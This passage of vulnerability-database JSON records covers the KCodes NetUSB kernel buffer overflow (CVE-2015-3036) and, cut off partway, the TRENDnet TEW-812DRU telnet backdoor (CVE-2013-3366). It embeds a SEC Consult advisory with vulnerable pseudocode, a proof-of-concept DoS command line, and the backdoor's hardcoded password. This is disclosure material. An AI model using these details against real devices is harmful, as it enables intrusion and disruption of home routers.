"trust": 0.3, "vendor": "netgear", "version": "0" }, { "_id": null, "model": "d6100", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "_id": null, "model": "centria wndr4720", "scope": null, "trust": 0.3, "vendor": "netgear", "version": null }, { "_id": null, "model": "centria wndr4700", "scope": null, "trust": 0.3, "vendor": "netgear", "version": null }, { "_id": null, "model": "ac1450", "scope": "eq", "trust": 0.3, "vendor": "netgear", "version": "0" }, { "_id": null, "model": "netusb", "scope": "eq", "trust": 0.3, "vendor": "kcodes", "version": "0" }, { "_id": null, "model": "dir-685", "scope": "eq", "trust": 0.3, "vendor": "d link", "version": "2.00" }, { "_id": null, "model": "dir-615", "scope": "eq", "trust": 0.3, "vendor": "d link", "version": "3.13" } ], "sources": [ { "db": "CERT/CC", "id": "VU#177092" }, { "db": "BID", "id": "74724" }, { "db": "JVNDB", "id": "JVNDB-2015-002741" }, { "db": "CNNVD", "id": "CNNVD-201505-429" }, { "db": "NVD", "id": "CVE-2015-3036" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:misc:multiple_vendors", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-002741" } ] }, "credits": { "_id": null, "data": "Stefan Viehb\u00f6ck from SEC Consult Vulnerability Lab", "sources": [ { "db": "BID", "id": "74724" } ], "trust": 0.3 }, "cve": "CVE-2015-3036", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CVE-2015-3036", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.9, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "ADJACENT NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "COMPLETE", "availabilityRequirement": "NOT DEFINED", "baseScore": 5.7, "collateralDamagePotential": "NOT DEFINED", "confidentialityImpact": "NONE", "confidentialityRequirement": "NOT DEFINED", "enviromentalScore": 3.7, "exploitability": "PROOF-OF-CONCEPT", "exploitabilityScore": 5.5, "id": "CVE-2015-3036", "impactScore": 6.9, "integrityImpact": "NONE", "integrityRequirement": "NOT DEFINED", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "remediationLevel": "WORKAROUND", "reportConfidence": "CONFIRMED", "severity": "MEDIUM", "targetDistribution": "MEDIUM", "trust": 0.8, "userInteractionRequired": null, "vector_string": "AV:A/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2015-3036", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2015-3036", "trust": 0.8, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2015-3036", "trust": 0.8, "value": "High" }, { "author": "CNNVD", "id": "CNNVD-201505-429", "trust": 0.6, "value": "CRITICAL" }, { "author": "VULMON", "id": "CVE-2015-3036", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "CERT/CC", "id": "VU#177092" }, { "db": "VULMON", "id": "CVE-2015-3036" }, { "db": "JVNDB", "id": "JVNDB-2015-002741" }, { "db": "CNNVD", "id": "CNNVD-201505-429" }, { "db": "NVD", "id": "CVE-2015-3036" } ] }, "description": { "_id": null, "data": "Stack-based buffer overflow in the run_init_sbus function in the KCodes NetUSB module for the Linux kernel, as used in certain NETGEAR products, TP-LINK products, and other products, allows remote attackers to execute arbitrary code by providing a long computer name in a session on TCP port 20005. KCodes NetUSB is vulnerable to a buffer overflow via the network that may result in a denial of service or code execution. KCodes NetUSB The kernel driver contains a buffer overflow vulnerability. KCodes NetUSB Is Linux Connected to base embedded devices (home router products, etc.) USB Share devices on the network \"USB over IP\" To realize the function, Linux Kernel module. Buffer overflow (CWE-120) - CVE-2015-3036 http://cwe.mitre.org/data/definitions/120.html The client NetUSB The data to send when connecting to the server NetUSB A buffer overflow can occur because the kernel driver does not validate properly. For more information SEC Consult Please check the advisory for. SEC Consult Vulnerability Lab Security Advisory \u003c 20150519-0 \u003e https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20150519-0_KCodes_NetUSB_Kernel_Stack_Buffer_Overflow_v10.txt In addition, National Vulnerability Database (NVD) Then CWE-119 It is published as CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer ( Buffer error ) http://cwe.mitre.org/data/definitions/119.htmlAn attacker on the local network caused a buffer overflow, resulting in a denial of service operation (DoS) An attacker may be able to attack or execute arbitrary code. Depending on the default settings of the device, a remote attack may be possible. KCodes NetUSB is prone to a buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. \nAn attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts may result in a denial-of-service condition. SEC Consult Vulnerability Lab Security Advisory \u003c 20150519-0 \u003e\n=======================================================================\n title: Kernel Stack Buffer Overflow\n product: KCodes NetUSB\n vulnerable version: see Vulnerable / tested versions\n fixed version: see Solution\n CVE number: CVE-2015-3036, VU#177092\n impact: Critical\n homepage: http://www.kcodes.com/\n found: 2015-02-23\n by: Stefan Viehb\u00f6ck (Office Vienna)\n SEC Consult Vulnerability Lab\n\n An integrated part of SEC Consult\n Berlin - Frankfurt/Main - Montreal - Singapore\n Vienna (HQ) - Vilnius - Zurich\n\n https://www.sec-consult.com\n\n=======================================================================\n\nVendor description:\n-------------------\n\"The world\u0027s premier technology provider of mobile printing, audio and\nvideo communication, file sharing, and USB applications for iPhones,\niPads, smart phones and tablets (Android and Windows), MacBooks, and\nUltrabooks.\"\n\nSource: http://www.kcodes.com/\n\n\nVulnerability overview/description:\n-----------------------------------\nNetUSB suffers from a remotely exploitable kernel stack buffer overflow. \nBecause of insufficient input validation, an overly long computer name can be\nused to overflow the \"computer name\" kernel stack buffer. This results in\nmemory corruption which can be turned into arbitrary remote code execution. \n\nFurthermore, a more detailed summary of this advisory has been published at our\nblog: http://blog.sec-consult.com\n\n\nProof of concept:\n-----------------\nBelow is an excerpt from the vulnerable run_init_sbus() function (pseudo code):\n\nint computername_len;\nchar computername_buf[64];\n// connection initiation, handshake\nlen = ks_recv(sock, \u0026computername_len, 4, 0);\n// ... \nlen = ks_recv(sock, computername_buf, computername_len, 0); // boom!\n\nA proof of concept \"netusb_bof.py\" has been developed which exploits the\nvulnerability. The PoC DoS exploit will not be published as many vendors\ndid not patch the vulnerability yet. \n\nExample use that results in denial-of-service (kernel memory corruption that\nresults in a device reboot):\n./netusb_bof.py 192.168.1.1 20005 500\n\n\nVulnerable / tested versions:\n-----------------------------\nThe vulnerability has been verified to exist in most recent firmware versions\nof the following devives:\n\nTP-Link TL-WDR4300 V1\nTP-Link WR1043ND v2\nNETGEAR WNDR4500\n\nFurthermore we\u0027ve identified NetUSB in the most recent firmware version of the\nfollowing products (list is not necessarily complete!):\nD-Link DIR-615 C\nNETGEAR AC1450\nNETGEAR CENTRIA (WNDR4700/4720)\nNETGEAR D6100\nNETGEAR D6200\nNETGEAR D6300\nNETGEAR D6400\nNETGEAR DC112A\nNETGEAR DC112A (Zain)\nNETGEAR DGND4000\nNETGEAR EX6200\nNETGEAR EX7000\nNETGEAR JNR3000\nNETGEAR JNR3210\nNETGEAR JR6150\nNETGEAR LG6100D\nNETGEAR PR2000\nNETGEAR R6050\nNETGEAR R6100\nNETGEAR R6200\nNETGEAR R6200v2\nNETGEAR R6220\nNETGEAR R6250\nNETGEAR R6300v1\nNETGEAR R6300v2\nNETGEAR R6700\nNETGEAR R7000\nNETGEAR R7500\nNETGEAR R7900\nNETGEAR R8000\nNETGEAR WN3500RP\nNETGEAR WNDR3700v5\nNETGEAR WNDR4300\nNETGEAR WNDR4300v2\nNETGEAR WNDR4500\nNETGEAR WNDR4500v2\nNETGEAR WNDR4500v3\nNETGEAR XAU2511\nNETGEAR XAUB2511\nTP-LINK Archer C2 V1.0 (Fix planned before 2015/05/22)\nTP-LINK Archer C20 V1.0 (Not affected)\nTP-LINK Archer C20i V1.0 (Fix planned before 2015/05/25)\nTP-LINK Archer C5 V1.2 (Fix planned before 2015/05/22)\nTP-LINK Archer C5 V2.0 (Fix planned before 2015/05/30)\nTP-LINK Archer C7 V1.0 (Fix planned before 2015/05/30)\nTP-LINK Archer C7 V2.0 (Fix already released)\nTP-LINK Archer C8 V1.0 (Fix planned before 2015/05/30)\nTP-LINK Archer C9 V1.0 (Fix planned before 2015/05/22)\nTP-LINK Archer D2 V1.0 (Fix planned before 2015/05/22)\nTP-LINK Archer D5 V1.0 (Fix planned before 2015/05/25)\nTP-LINK Archer D7 V1.0 (Fix planned before 2015/05/25)\nTP-LINK Archer D7B V1.0 (Fix planned before 2015/05/31)\nTP-LINK Archer D9 V1.0 (Fix planned before 2015/05/25)\nTP-LINK Archer VR200v V1.0 (Fix already released)\nTP-LINK TD-VG3511 V1.0 (End-Of-Life)\nTP-LINK TD-VG3631 V1.0 (Fix planned before 2015/05/30)\nTP-LINK TD-VG3631 V1.0 (Fix planned before 2015/05/31)\nTP-LINK TD-W1042ND V1.0 (End-Of-Life)\nTP-LINK TD-W1043ND V1.0 (End-Of-Life)\nTP-LINK TD-W8968 V1.0 (Fix planned before 2015/05/30)\nTP-LINK TD-W8968 V2.0 (Fix planned before 2015/05/30)\nTP-LINK TD-W8968 V3.0 (Fix planned before 2015/05/25)\nTP-LINK TD-W8970 V1.0 (Fix planned before 2015/05/30)\nTP-LINK TD-W8970 V3.0 (Fix already released)\nTP-LINK TD-W8970B V1.0 (Fix planned before 2015/05/30)\nTP-LINK TD-W8980 V3.0 (Fix planned before 2015/05/25)\nTP-LINK TD-W8980B V1.0 (Fix planned before 2015/05/30)\nTP-LINK TD-W9980 V1.0 (Fix already released)\nTP-LINK TD-W9980B V1.0 (Fix planned before 2015/05/30)\nTP-LINK TD-WDR4900 V1.0 (End-Of-Life)\nTP-LINK TL-WR1043ND V2.0 (Fix planned before 2015/05/30)\nTP-LINK TL-WR1043ND V3.0 (Fix planned before 2015/05/30)\nTP-LINK TL-WR1045ND V2.0 (Fix planned before 2015/05/30)\nTP-LINK TL-WR3500 V1.0 (Fix planned before 2015/05/22)\nTP-LINK TL-WR3600 V1.0 (Fix planned before 2015/05/22)\nTP-LINK TL-WR4300 V1.0 (Fix planned before 2015/05/22)\nTP-LINK TL-WR842ND V2.0 (Fix planned before 2015/05/30)\nTP-LINK TL-WR842ND V1.0 (End-Of-Life)\nTP-LINK TX-VG1530(GPON) V1.0 (Fix planned before 2015/05/31)\nTrendnet TE100-MFP1 (v1.0R)\nTrendnet TEW-632BRP (A1.0R)\nTrendnet TEW-632BRP (A1.1R/A1.2R)\nTrendnet TEW-632BRP (A1.1R/A1.2R/A1.3R)\nTrendnet TEW-634GRU (v1.0R)\nTrendnet TEW-652BRP (V1.0R)\nTrendnet TEW-673GRU (v1.0R)\nTrendnet TEW-811DRU (v1.0R)\nTrendnet TEW-812DRU (v1.0R)\nTrendnet TEW-812DRU (v2.xR)\nTrendnet TEW-813DRU (v1.0R)\nTrendnet TEW-818DRU (v1.0R)\nTrendnet TEW-823DRU (v1.0R)\nTrendnet TEW-MFP1 (v1.0R)\nZyxel NBG-419N v2\nZyxel NBG4615 v2\nZyxel NBG5615\nZyxel NBG5715\n\nBased on information embedded in KCodes drivers we believe the following\nvendors are affected:\nAllnet\nAmbir Technology\nAMIT\nAsante\nAtlantis\nCorega\nDigitus\nD-Link\nEDIMAX\nEncore Electronics\nEngenius\nEtop\nHardlink\nHawking\nIOGEAR\nLevelOne\nLongshine\nNETGEAR\nPCI\nPROLiNK\nSitecom\nTaifa\nTP-LINK\nTRENDnet\nWestern Digital\nZyXEL\n\n\nVendor contact timeline:\n------------------------\n2015-02-28: Contacting vendor through support@kcodes.com\n2015-03-04: No response, contacting various KCodes addresses found on the web. \n2015-03-05: Vendor responds, requests more information. \n2015-03-05: Providing advisory and proof of concept exploit. \n2015-03-16: No response, requesting status update. \n2015-03-16: Vendor responds, asks about fix verification(?)\n2015-03-16: Requesting clarification about fixing status and information about\n next steps. Proposing conference call dates. \n2015-03-19: No response, informing that notification of CERT/CC and selected\n vendors will start shortly. Requesting clarification about fixing\n status and information about next steps again. \n2015-03-19: Vendor responds, confirms conference call date (2015-03-25). No\n further information provided. \n2015-03-19: Providing advisory and proof of concept exploit to TP-LINK and\n NETGEAR. \n2015-03-25: Vendor cancels conference call on short notice (sudden week-long\n business trip). \n2015-03-26: Asking for support of CERT/CC regarding vendor coordination. \n2015-03 - 2015-05: Coordination between CERT \u0026 vendors, NETGEAR and TP-LINK\n2015-05-13: Notifying German CERT-Bund and Austrian CERT.at\n2015-05-19: Coordinated release of security advisory\n\n\nSolution:\n---------\nTP-LINK has started releasing fixed firmware. The status of affected products\ncan be found in the affected product list above. \n\nFor additional information also see CERT/CC vulnerability notice:\nhttp://www.kb.cert.org/vuls/id/177092\n\n\nWorkaround:\n-----------\nSometimes NetUSB can be disabled via the web interface, but at least on NETGEAR\ndevices this does not mitigate the vulnerability. NETGEAR told us, that there is\nno workaround available, the TCP port can\u0027t be firewalled nor is there a way to\ndisable the service on their devices. It\nensures the continued knowledge gain of SEC Consult in the field of network\nand application security to stay ahead of the attacker. The SEC Consult\nVulnerability Lab supports high-quality penetration testing and the evaluation\nof new offensive and defensive technologies for our customers. Hence our\ncustomers obtain the most current information about vulnerabilities and valid\nrecommendation about the risk profile of new technologies. \n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nInterested to work with the experts of SEC Consult?\nSend us your application https://www.sec-consult.com/en/Career.htm\n\nInterested in improving your cyber security with the experts of SEC Consult?\nContact our local offices https://www.sec-consult.com/en/About/Contact.htm\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nMail: research at sec-consult dot com\nWeb: https://www.sec-consult.com\nBlog: http://blog.sec-consult.com\nTwitter: https://twitter.com/sec_consult\n\nEOF Stefan Viehb\u00f6ck / @2015\n\n", "sources": [ { "db": "NVD", "id": "CVE-2015-3036" }, { "db": "CERT/CC", "id": "VU#177092" }, { "db": "JVNDB", "id": "JVNDB-2015-002741" }, { "db": "BID", "id": "74724" }, { "db": "VULMON", "id": "CVE-2015-3036" }, { "db": "PACKETSTORM", "id": "131987" } ], "trust": 2.79 }, "exploit_availability": { "_id": null, "data": [ { "reference": "https://www.kb.cert.org/vuls/id/177092", "trust": 0.8, "type": "poc" }, { "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=38566", "trust": 0.2, "type": "exploit" } ], "sources": [ { "db": "CERT/CC", "id": "VU#177092" }, { "db": "VULMON", "id": "CVE-2015-3036" } ] }, "external_ids": { "_id": null, "data": [ { "db": "CERT/CC", "id": "VU#177092", "trust": 3.7 }, { "db": "NVD", "id": "CVE-2015-3036", "trust": 2.9 }, { "db": "BID", "id": "74724", "trust": 1.4 }, { "db": "PACKETSTORM", "id": "131987", "trust": 1.2 }, { "db": "SECTRACK", "id": "1032377", "trust": 1.1 }, { "db": "PACKETSTORM", "id": "133919", "trust": 1.1 }, { "db": "EXPLOIT-DB", "id": "38566", "trust": 1.1 }, { "db": "EXPLOIT-DB", "id": "38454", "trust": 1.1 }, { "db": "JVN", "id": "JVNVU90185396", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2015-002741", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201505-429", "trust": 0.6 }, { "db": "DLINK", "id": "SAP10057", "trust": 0.3 }, { "db": "VULMON", "id": "CVE-2015-3036", "trust": 0.1 } ], "sources": [ { "db": "CERT/CC", "id": "VU#177092" }, { "db": "VULMON", "id": "CVE-2015-3036" }, { "db": "BID", "id": "74724" }, { "db": "JVNDB", "id": "JVNDB-2015-002741" }, { "db": "PACKETSTORM", "id": "131987" }, { "db": "CNNVD", "id": "CNNVD-201505-429" }, { "db": "NVD", "id": "CVE-2015-3036" } ] }, "id": "VAR-201505-0408", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.5379009930555555 }, "last_update_date": "2024-11-23T23:09:15.345000Z", "patch": { "_id": null, "data": [ { "title": "USB Over IP (NetUSB)", "trust": 0.8, "url": "http://www.kcodes.com/product/usb_01.html" }, { "title": "The Register", "trust": 0.2, "url": "https://www.theregister.co.uk/2015/05/20/netusb_router_fail/" }, { "title": "TD-W8970-NetUSB-Fix-v1-", "trust": 0.1, "url": "https://github.com/Leproide/TD-W8970-NetUSB-Fix-v1- " }, { "title": "NetUSB-exploit", "trust": 0.1, "url": "https://github.com/funsecurity/NetUSB-exploit " }, { "title": "MiraiSecurity", "trust": 0.1, "url": "https://github.com/pandazheng/MiraiSecurity " }, { "title": "Threatpost", "trust": 0.1, "url": "https://threatpost.com/details-surface-on-unpatched-kcodes-netusb-bug/112910/" } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-3036" }, { "db": "JVNDB", "id": "JVNDB-2015-002741" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-119", "trust": 1.8 }, { "problemtype": "CWE-Other", "trust": 0.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-002741" }, { "db": "NVD", "id": "CVE-2015-3036" } ] }, "references": { "_id": null, "data": [ { "trust": 3.6, "url": "https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20150519-0_kcodes_netusb_kernel_stack_buffer_overflow_v10.txt" }, { "trust": 3.3, "url": "http://blog.sec-consult.com/2015/05/kcodes-netusb-how-small-taiwanese.html" }, { "trust": 2.9, "url": "http://www.kb.cert.org/vuls/id/177092" }, { "trust": 1.2, "url": "http://www.securityfocus.com/bid/74724" }, { "trust": 1.2, "url": "https://www.exploit-db.com/exploits/38566/" }, { "trust": 1.1, "url": "http://securityadvisories.dlink.com/security/publication.aspx?name=sap10057" }, { "trust": 1.1, "url": "http://packetstormsecurity.com/files/131987/kcodes-netusb-buffer-overflow.html" }, { "trust": 1.1, "url": "http://seclists.org/fulldisclosure/2015/may/74" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1032377" }, { "trust": 1.1, "url": "http://packetstormsecurity.com/files/133919/netusb-stack-buffer-overflow.html" }, { "trust": 1.1, "url": "http://seclists.org/fulldisclosure/2015/oct/50" }, { "trust": 1.1, "url": "https://www.exploit-db.com/exploits/38454/" }, { "trust": 0.8, "url": "http://kb.netgear.com/app/answers/detail/a_id/28393/" }, { "trust": 0.8, "url": "http://www.trendnet.com/support/view.asp?cat=4\u0026id=58" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-3036" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu90185396/index.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-3036" }, { "trust": 0.3, "url": "http://www.kcodes.com/product/usb_01.html" }, { "trust": 0.3, "url": "https://github.com/funsecurity/netusb-exploit" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/119.html" }, { "trust": 0.1, "url": "https://github.com/leproide/td-w8970-netusb-fix-v1-" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://www.sec-consult.com/en/career.htm" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3036" }, { "trust": 0.1, "url": "https://www.sec-consult.com" }, { "trust": 0.1, "url": "https://www.sec-consult.com/en/about/contact.htm" }, { "trust": 0.1, "url": "https://twitter.com/sec_consult" }, { "trust": 0.1, "url": "http://blog.sec-consult.com" }, { "trust": 0.1, "url": "http://www.kcodes.com/" }, { "trust": 0.1, "url": "https://www.sec-consult.com/en/vulnerability-lab/advisories.htm" } ], "sources": [ { "db": "CERT/CC", "id": "VU#177092" }, { "db": "VULMON", "id": "CVE-2015-3036" }, { "db": "BID", "id": "74724" }, { "db": "JVNDB", "id": "JVNDB-2015-002741" }, { "db": "PACKETSTORM", "id": "131987" }, { "db": "CNNVD", "id": "CNNVD-201505-429" }, { "db": "NVD", "id": "CVE-2015-3036" } ] }, "sources": { "_id": null, "data": [ { "db": "CERT/CC", "id": "VU#177092", "ident": null }, { "db": "VULMON", "id": "CVE-2015-3036", "ident": null }, { "db": "BID", "id": "74724", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2015-002741", "ident": null }, { "db": "PACKETSTORM", "id": "131987", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201505-429", "ident": null }, { "db": "NVD", "id": "CVE-2015-3036", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2015-05-19T00:00:00", "db": "CERT/CC", "id": "VU#177092", "ident": null }, { "date": "2015-05-21T00:00:00", "db": "VULMON", "id": "CVE-2015-3036", "ident": null }, { "date": "2015-05-19T00:00:00", "db": "BID", "id": "74724", "ident": null }, { "date": "2015-05-21T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-002741", "ident": null }, { "date": "2015-05-21T14:44:44", "db": "PACKETSTORM", "id": "131987", "ident": null }, { "date": "2015-05-21T00:00:00", "db": "CNNVD", "id": "CNNVD-201505-429", "ident": null }, { "date": "2015-05-21T01:59:27.087000", "db": "NVD", "id": "CVE-2015-3036", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2015-06-05T00:00:00", "db": "CERT/CC", "id": "VU#177092", "ident": null }, { "date": "2016-12-08T00:00:00", "db": "VULMON", "id": "CVE-2015-3036", "ident": null }, { "date": "2015-12-08T22:03:00", "db": "BID", "id": "74724", "ident": null }, { "date": "2015-05-22T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-002741", "ident": null }, { "date": "2015-05-21T00:00:00", "db": "CNNVD", "id": "CNNVD-201505-429", "ident": null }, { "date": "2024-11-21T02:28:31.787000", "db": "NVD", "id": "CVE-2015-3036", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201505-429" } ], "trust": 0.6 }, "title": { "_id": null, "data": "KCodes NetUSB kernel driver is vulnerable to buffer overflow", "sources": [ { "db": "CERT/CC", "id": "VU#177092" } ], "trust": 0.8 }, "type": { "_id": null, "data": "buffer overflow", "sources": [ { "db": "CNNVD", "id": "CNNVD-201505-429" } ], "trust": 0.6 } }
var-201911-1469
Vulnerability from variot
Undocumented TELNET service in TRENDnet TEW-812DRU when a web page named backdoor contains an HTML parameter of password and a value of j78G¬DFdg_24Mhw3. TRENDnet TEW-812DRU Contains a cross-site request forgery vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201911-1469", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "tew-812dru", "scope": "eq", "trust": 1.0, "vendor": "trendnet", "version": null }, { "model": "tew-812dru", "scope": null, "trust": 0.8, "vendor": "trendnet", "version": null } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-006930" }, { "db": "NVD", "id": "CVE-2013-3366" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/o:trendnet:tew-812dru_firmware", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-006930" } ] }, "cve": "CVE-2013-3366", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "CVE-2013-3366", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.9, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 2.8, "id": "CVE-2013-3366", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 8.8, "baseSeverity": "High", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "CVE-2013-3366", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "Required", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2013-3366", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2013-3366", "trust": 0.8, "value": "High" }, { "author": "CNNVD", "id": "CNNVD-201911-770", "trust": 0.6, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2013-3366", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2013-3366" }, { "db": "JVNDB", "id": "JVNDB-2013-006930" }, { "db": "CNNVD", "id": "CNNVD-201911-770" }, { "db": "NVD", "id": "CVE-2013-3366" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Undocumented TELNET service in TRENDnet TEW-812DRU when a web page named backdoor contains an HTML parameter of password and a value of j78G\u00acDFdg_24Mhw3. TRENDnet TEW-812DRU Contains a cross-site request forgery vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state", "sources": [ { "db": "NVD", "id": "CVE-2013-3366" }, { "db": "JVNDB", "id": "JVNDB-2013-006930" }, { "db": "VULMON", "id": "CVE-2013-3366" } ], "trust": 1.71 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2013-3366", "trust": 2.5 }, { "db": "JVNDB", "id": "JVNDB-2013-006930", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201911-770", "trust": 0.6 }, { "db": "VULMON", "id": "CVE-2013-3366", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2013-3366" }, { "db": "JVNDB", "id": "JVNDB-2013-006930" }, { "db": "CNNVD", "id": "CNNVD-201911-770" }, { "db": "NVD", "id": "CVE-2013-3366" } ] }, "id": "VAR-201911-1469", "iot": { "@context": { "@vocab": 